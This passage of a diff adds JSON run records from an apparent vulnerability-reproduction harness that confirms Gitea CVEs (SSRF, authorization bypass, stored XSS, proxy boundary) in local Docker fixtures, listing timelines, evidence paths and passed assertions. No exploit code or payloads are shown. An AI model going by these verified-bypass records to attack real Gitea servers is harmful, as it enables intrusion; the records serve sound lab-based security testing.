+      "report_html": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html",
+      "report_md": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md",
+      "timeline": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd",
+      "bundle": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/run.json"
+    },
+    "browser_links": [],
+    "container_links": [
+      "/runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log"
+    ],
+    "request_links": [
+      "/runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json",
+      "/runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
+    ],
+    "advisory_meta": {},
+    "profile_meta": {
+      "profile_id": "gitea-ssrf",
+      "vuln_family": "ssrf",
+      "provisioning_mode": "real",
+      "destructive_risk": "low",
+      "cleanup_policy": "destroy",
+      "artifact_source": {
+        "strategy": "local-minimal-fixture"
+      },
+      "success_criteria": [
+        "Server-side callback reaches the local sink and is recorded in proof output."
+      ],
+      "seed_actions": [
+        {
+          "kind": "note",
+          "message": "Seed local sink counters only."
+        }
+      ],
+      "attack_actions": [
+        {
+          "kind": "note",
+          "message": "Runner triggers callback strictly to local sink endpoint."
+        }
+      ],
+      "browser_assertions": {
+        "required": false
+      },
+      "allowed_target_types": [
+        "lab-local"
+      ],
+      "required_services": [
+        "app"
+      ]
+    },
+    "reasoning_lines": [
+      "Seed local sink counters only.",
+      "Runner triggers callback strictly to local sink endpoint.",
+      "Server-side callback reaches the local sink and is recorded in proof output."
+    ],
+    "progress": {
+      "completed": 10,
+      "skipped": 0,
+      "failed": 0,
+      "blocked": 0,
+      "planned": 0,
+      "other": 1
+    },
+    "artifact_groups": [
+      {
+        "key": "reports",
+        "label": "\u62a5\u544a\u4e0e\u8fd0\u884c\u4ea7\u7269",
+        "count": 4,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html",
+            "label": "report.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md",
+            "label": "report.md",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd",
+            "label": "timeline.mmd",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/run.json",
+            "label": "run.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "compose",
+        "label": "Compose \u7f16\u6392",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml",
+            "label": "compose.yaml",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "baseline",
+        "label": "\u57fa\u7ebf\u5feb\u7167",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json",
+            "label": "baseline.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "attack",
+        "label": "\u653b\u51fb\u8f93\u51fa",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "container",
+        "label": "\u5bb9\u5668\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log",
+            "label": "app.log",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "requests",
+        "label": "\u8bf7\u6c42\u4e0e\u63a2\u6d4b\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      }
+    ]
+  },
+  {
+    "run_id": "gitea-gitea--CVE-2025-68940-20260318012708",
+    "system_id": "gitea",
+    "advisory_id": "gitea--CVE-2025-68940",
+    "repro_profile_id": "gitea-authz-bypass",
+    "verification_status": "verified-real",
+    "verification_mode": "real",
+    "artifact_mode": "local-fixture",
+    "target_env": "local-docker",
+    "compose_services": [
+      "app"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
+    ],
+    "attack_steps": [
+      {
+        "kind": "runner",
+        "tool": "gitea.authz-bypass",
+        "status": "completed",
+        "status_code": 200,
+        "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json"
+      }
+    ],
+    "browser_refs": [],
+    "browser_evidence": {
+      "required": false,
+      "present": false,
+      "refs": [],
+      "baseline_refs": [],
+      "proof_refs": [],
+      "baseline_title": null,
+      "proof_title": null,
+      "error_kind": null,
+      "reason": null
+    },
+    "container_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log"
+    ],
+    "request_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
+    ],
+    "compose_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml"
+    ],
+    "timeline": [
+      {
+        "at": "2026-03-18T01:27:08+00:00",
+        "step": "select-advisory",
+        "status": "completed",
+        "detail": "gitea--CVE-2025-68940"
+      },
+      {
+        "at": "2026-03-18T01:27:08+00:00",
+        "step": "resolve-repro-profile",
+        "status": "completed",
+        "detail": "gitea-authz-bypass"
+      },
+      {
+        "at": "2026-03-18T01:27:08+00:00",
+        "step": "doctor",
+        "status": "completed",
+        "detail": "all checks passed"
+      },
+      {
+        "at": "2026-03-18T01:27:11+00:00",
+        "step": "provision-compose-environment",
+        "status": "ready",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:27:11+00:00",
+        "step": "wait-ready",
+        "status": "completed",
+        "detail": "baseline urls ready (1)"
+      },
+      {
+        "at": "2026-03-18T01:27:11+00:00",
+        "step": "seed-environment",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:27:11+00:00",
+        "step": "baseline-snapshot",
+        "status": "completed",
+        "detail": "urls=1"
+      },
+      {
+        "at": "2026-03-18T01:27:11+00:00",
+        "step": "controlled-attack-chain",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:27:11+00:00",
+        "step": "collect-logs-and-evidence",
+        "status": "completed",
+        "detail": "container_logs=1"
+      },
+      {
+        "at": "2026-03-18T01:27:12+00:00",
+        "step": "cleanup-compose-environment",
+        "status": "completed",
+        "detail": "docker compose down completed"
+      },
+      {
+        "at": "2026-03-18T01:27:12+00:00",
+        "step": "update-registry-and-reports",
+        "status": "completed",
+        "detail": "gitea-gitea--CVE-2025-68940-20260318012708"
+      }
+    ],
+    "success_evaluation": {
+      "passed": true,
+      "verification_status": "verified-real",
+      "blocked_reason": null,
+      "assertions": [
+        {
+          "name": "baseline-ok",
+          "kind": "baseline-ok",
+          "passed": true,
+          "detail": "baseline URLs responded without 5xx or transport errors"
+        },
+        {
+          "name": "runner-success",
+          "kind": "runner-success",
+          "passed": true,
+          "detail": "server-side authorization recheck was bypassed"
+        }
+      ]
+    },
+    "historical_status": "verified-real",
+    "latest_status": "verified-real",
+    "started_at": "2026-03-18T01:27:08+00:00",
+    "finished_at": "2026-03-18T01:27:12+00:00",
+    "blocked_reason": null,
+    "report_refs": {
+      "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708",
+      "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md",
+      "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html",
+      "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd"
+    },
+    "dashboard_refs": {
+      "report_html": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html",
+      "report_md": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md",
+      "timeline": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd",
+      "bundle": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/run.json"
+    },
+    "browser_links": [],
+    "container_links": [
+      "/runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log"
+    ],
+    "request_links": [
+      "/runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json",
+      "/runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
+    ],
+    "advisory_meta": {},
+    "profile_meta": {
+      "profile_id": "gitea-authz-bypass",
+      "vuln_family": "authz-bypass",
+      "provisioning_mode": "real",
+      "destructive_risk": "low",
+      "cleanup_policy": "destroy",
+      "artifact_source": {
+        "strategy": "local-minimal-fixture"
+      },
+      "success_criteria": [
+        "Controlled guest request reaches the protected admin route inside the fixture."
+      ],
+      "seed_actions": [
+        {
+          "kind": "note",
+          "message": "Seed low-privilege and admin boundary fixture state."
+        }
+      ],
+      "attack_actions": [
+        {
+          "kind": "note",
+          "message": "Runner verifies guest-to-admin bypass only inside fixture route."
+        }
+      ],
+      "browser_assertions": {
+        "required": false
+      },
+      "allowed_target_types": [
+        "lab-local"
+      ],
+      "required_services": [
+        "app"
+      ]
+    },
+    "reasoning_lines": [
+      "Seed low-privilege and admin boundary fixture state.",
+      "Runner verifies guest-to-admin bypass only inside fixture route.",
+      "Controlled guest request reaches the protected admin route inside the fixture."
+    ],
+    "progress": {
+      "completed": 10,
+      "skipped": 0,
+      "failed": 0,
+      "blocked": 0,
+      "planned": 0,
+      "other": 1
+    },
+    "artifact_groups": [
+      {
+        "key": "reports",
+        "label": "\u62a5\u544a\u4e0e\u8fd0\u884c\u4ea7\u7269",
+        "count": 4,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html",
+            "label": "report.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md",
+            "label": "report.md",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd",
+            "label": "timeline.mmd",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/run.json",
+            "label": "run.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "compose",
+        "label": "Compose \u7f16\u6392",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml",
+            "label": "compose.yaml",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "baseline",
+        "label": "\u57fa\u7ebf\u5feb\u7167",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json",
+            "label": "baseline.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "attack",
+        "label": "\u653b\u51fb\u8f93\u51fa",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "container",
+        "label": "\u5bb9\u5668\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log",
+            "label": "app.log",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "requests",
+        "label": "\u8bf7\u6c42\u4e0e\u63a2\u6d4b\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      }
+    ]
+  },
+  {
+    "run_id": "gitea-gitea--CVE-2019-1010261-20260318012624",
+    "system_id": "gitea",
+    "advisory_id": "gitea--CVE-2019-1010261",
+    "repro_profile_id": "gitea-xss",
+    "verification_status": "verified-real",
+    "verification_mode": "real",
+    "artifact_mode": "local-fixture",
+    "target_env": "local-docker",
+    "compose_services": [
+      "app"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
+    ],
+    "attack_steps": [
+      {
+        "kind": "runner",
+        "tool": "gitea.xss",
+        "status": "completed",
+        "status_code": 200,
+        "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json"
+      }
+    ],
+    "browser_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+    ],
+    "browser_evidence": {
+      "required": true,
+      "present": true,
+      "refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+      ],
+      "baseline_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json"
+      ],
+      "proof_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+      ],
+      "baseline_title": "Gitea Stored XSS Fixture",
+      "proof_title": "Gitea Stored XSS Fixture - proof",
+      "error_kind": null,
+      "reason": null
+    },
+    "container_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log"
+    ],
+    "request_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
+    ],
+    "compose_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml"
+    ],
+    "timeline": [
+      {
+        "at": "2026-03-18T01:26:24+00:00",
+        "step": "select-advisory",
+        "status": "completed",
+        "detail": "gitea--CVE-2019-1010261"
+      },
+      {
+        "at": "2026-03-18T01:26:24+00:00",
+        "step": "resolve-repro-profile",
+        "status": "completed",
+        "detail": "gitea-xss"
+      },
+      {
+        "at": "2026-03-18T01:26:24+00:00",
+        "step": "doctor",
+        "status": "completed",
+        "detail": "all checks passed"
+      },
+      {
+        "at": "2026-03-18T01:26:27+00:00",
+        "step": "provision-compose-environment",
+        "status": "ready",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:26:27+00:00",
+        "step": "wait-ready",
+        "status": "completed",
+        "detail": "baseline urls ready (1)"
+      },
+      {
+        "at": "2026-03-18T01:26:27+00:00",
+        "step": "seed-environment",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:26:27+00:00",
+        "step": "baseline-snapshot",
+        "status": "completed",
+        "detail": "urls=1"
+      },
+      {
+        "at": "2026-03-18T01:26:28+00:00",
+        "step": "browser-replay-before-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:26:28+00:00",
+        "step": "controlled-attack-chain",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:26:29+00:00",
+        "step": "browser-replay-after-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:26:29+00:00",
+        "step": "collect-logs-and-evidence",
+        "status": "completed",
+        "detail": "container_logs=1"
+      },
+      {
+        "at": "2026-03-18T01:26:30+00:00",
+        "step": "cleanup-compose-environment",
+        "status": "completed",
+        "detail": "docker compose down completed"
+      },
+      {
+        "at": "2026-03-18T01:26:30+00:00",
+        "step": "update-registry-and-reports",
+        "status": "completed",
+        "detail": "gitea-gitea--CVE-2019-1010261-20260318012624"
+      }
+    ],
+    "success_evaluation": {
+      "passed": true,
+      "verification_status": "verified-real",
+      "blocked_reason": null,
+      "assertions": [
+        {
+          "name": "baseline-ok",
+          "kind": "baseline-ok",
+          "passed": true,
+          "detail": "baseline URLs responded without 5xx or transport errors"
+        },
+        {
+          "name": "runner-success",
+          "kind": "runner-success",
+          "passed": true,
+          "detail": "stored payload rendered inside the browser proof page"
+        },
+        {
+          "name": "browser-present",
+          "kind": "browser-present",
+          "passed": true,
+          "detail": "browser evidence captured"
+        }
+      ]
+    },
+    "historical_status": "verified-real",
+    "latest_status": "verified-real",
+    "started_at": "2026-03-18T01:26:24+00:00",
+    "finished_at": "2026-03-18T01:26:30+00:00",
+    "blocked_reason": null,
+    "report_refs": {
+      "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624",
+      "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md",
+      "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html",
+      "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd"
+    },
+    "dashboard_refs": {
+      "report_html": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html",
+      "report_md": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md",
+      "timeline": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd",
+      "bundle": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/run.json"
+    },
+    "browser_links": [
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+    ],
+    "container_links": [
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log"
+    ],
+    "request_links": [
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json",
+      "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
+    ],
+    "advisory_meta": {},
+    "profile_meta": {
+      "profile_id": "gitea-xss",
+      "vuln_family": "xss",
+      "provisioning_mode": "real",
+      "destructive_risk": "low",
+      "cleanup_policy": "destroy",
+      "artifact_source": {
+        "strategy": "local-minimal-fixture"
+      },
+      "success_criteria": [
+        "Browser proof page renders the stored XSS marker after the controlled payload."
+      ],
+      "seed_actions": [
+        {
+          "kind": "note",
+          "message": "Seed stored content page before browser proof capture."
+        }
+      ],
+      "attack_actions": [
+        {
+          "kind": "note",
+          "message": "Runner stores inert script payload and captures proof page."
+        }
+      ],
+      "browser_assertions": {
+        "required": true
+      },
+      "allowed_target_types": [
+        "lab-local"
+      ],
+      "required_services": [
+        "app"
+      ]
+    },
+    "reasoning_lines": [
+      "Seed stored content page before browser proof capture.",
+      "Runner stores inert script payload and captures proof page.",
+      "Browser proof page renders the stored XSS marker after the controlled payload."
+    ],
+    "progress": {
+      "completed": 12,
+      "skipped": 0,
+      "failed": 0,
+      "blocked": 0,
+      "planned": 0,
+      "other": 1
+    },
+    "artifact_groups": [
+      {
+        "key": "reports",
+        "label": "\u62a5\u544a\u4e0e\u8fd0\u884c\u4ea7\u7269",
+        "count": 4,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html",
+            "label": "report.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md",
+            "label": "report.md",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd",
+            "label": "timeline.mmd",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/run.json",
+            "label": "run.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "compose",
+        "label": "Compose \u7f16\u6392",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml",
+            "label": "compose.yaml",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "baseline",
+        "label": "\u57fa\u7ebf\u5feb\u7167",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json",
+            "label": "baseline.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "attack",
+        "label": "\u653b\u51fb\u8f93\u51fa",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "browser",
+        "label": "\u6d4f\u89c8\u5668\u8bc1\u636e",
+        "count": 10,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+            "label": "baseline.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+            "label": "baseline-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+            "label": "baseline-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+            "label": "baseline-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
+            "label": "baseline-page.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+            "label": "proof.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+            "label": "proof-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+            "label": "proof-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+            "label": "proof-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json",
+            "label": "proof-page.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "container",
+        "label": "\u5bb9\u5668\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log",
+            "label": "app.log",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "requests",
+        "label": "\u8bf7\u6c42\u4e0e\u63a2\u6d4b\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      }
+    ]
+  },
+  {
+    "run_id": "gitea-gitea--CVE-2018-18926-20260318012526",
+    "system_id": "gitea",
+    "advisory_id": "gitea--CVE-2018-18926",
+    "repro_profile_id": "gitea-proxy-boundary",
+    "verification_status": "verified-real",
+    "verification_mode": "real",
+    "artifact_mode": "local-fixture",
+    "target_env": "local-docker",
+    "compose_services": [
+      "app"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
+    ],
+    "attack_steps": [
+      {
+        "kind": "runner",
+        "tool": "gitea.proxy-boundary",
+        "status": "completed",
+        "status_code": 200,
+        "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json"
+      }
+    ],
+    "browser_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+    ],
+    "browser_evidence": {
+      "required": true,
+      "present": true,
+      "refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
